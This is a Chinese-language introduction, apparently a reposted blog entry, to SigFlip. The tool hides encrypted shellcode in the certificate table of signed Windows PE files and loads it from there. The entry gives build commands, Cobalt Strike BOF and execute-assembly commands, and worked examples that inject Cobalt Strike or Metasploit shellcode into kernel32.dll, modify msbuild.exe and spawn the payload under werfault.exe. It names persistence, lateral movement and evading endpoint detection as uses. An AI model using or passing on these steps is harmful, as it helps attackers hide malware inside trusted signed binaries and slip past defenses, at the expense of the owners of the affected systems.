如何使用SigFlip篡改身份認證碼簽名的PE文件
關于SigFlip
SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。換句話來說,就是我們可以使用SigFlip向PE文件中嵌入數據(比如Shellcode),并且再不會破壞文件簽名、完整性檢查或PE文件功能的情況下,修改PE文件的校驗和或哈希。
SigInject組件可以將Shellcode注入至PE文件的[WIN_CERTIFICATE]證書表中,并輸出加密密鑰以便配合BOF/C/C#加載器(SigLoader)一起使用。SigInject將保存針對PE文件的修改操作,并保證其簽名和證書有效性不變。
SigLoader是一個基礎加載器,它采用SigInject創建的修改后的PE文件路徑和解密密鑰作為參數,然后提取和解密嵌入的Shellcode,以供選擇Shellcode注入使用。
SigFlip將檢查PE哈希是否已成功更改,然后退出以繞過終端針對此類行為的檢查。
SigFlip可以用于持久化感染、橫向滲透以及命令/代碼執行等場景。
注意事項:igFlip、SigInject和SigLoader將以BOF腳本和.NET程序集提供。
工具安裝
廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
- git clone https://github.com/med0x2e/SigFlip.git
工具構建/編譯
本項目并沒有提供預編譯的BOF,我們可以使用Mingw-w64來進行編譯。如果是.NET,可以使用VS或csc.exe來編譯.NET項目(SigFlip、SigLoader);如果是BOF,請按照下列步驟操作:
- ➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o
- ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o
- ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o
- ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o
確保所有的對象文件都存儲在sigflip.cna的相同目錄下,然后在Cobalt Strike中加載sigflip.cna。
注意事項:預編譯的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能會出現崩潰的情況。
Cobalt Strike
執行程序集:
- execute-assembly SigFlip.exe -h
- execute-assembly SigLoader -h
BOF:
當我們在Cobalt Strike中加載sigflip.cna了之后,將會注冊兩個新命令,我們此時就能夠以下列方式使用SigFlip和SigInject了。
- SigFlip:在不破壞簽名或證書有效性的情況下,修改PE文件哈希:
- SigFlip "<PE\_FILE\_PATH>" "<OUTPUT\_PE\_FILE\_PATH (with extension)>"
- SigInject "<PE\_FILE\_PATH> <OUTPUT\_PE\_FILE\_PATH (with extension)>" "<SHELLCODE\_FILE>"
- SigLoader <PE_FILE_PATH_WITH_SH> <DECRYPTION_KEY> <SPAWNTO_PROCESS_PATH> <PARENT_PROCESS_ID>
工具使用樣例
(1) BOF
向msbuild.exe注入隨機數據:
- SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe"
向kernel32.ell注入Shellcode:
- SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin"
- Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300
(2) 執行程序集
向msbuild.exe注入隨機數據:
- execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe
向kernel32.ell注入Shellcode:
- execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey
- execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354
項目地址
SigFlip:【GitHub傳送門】
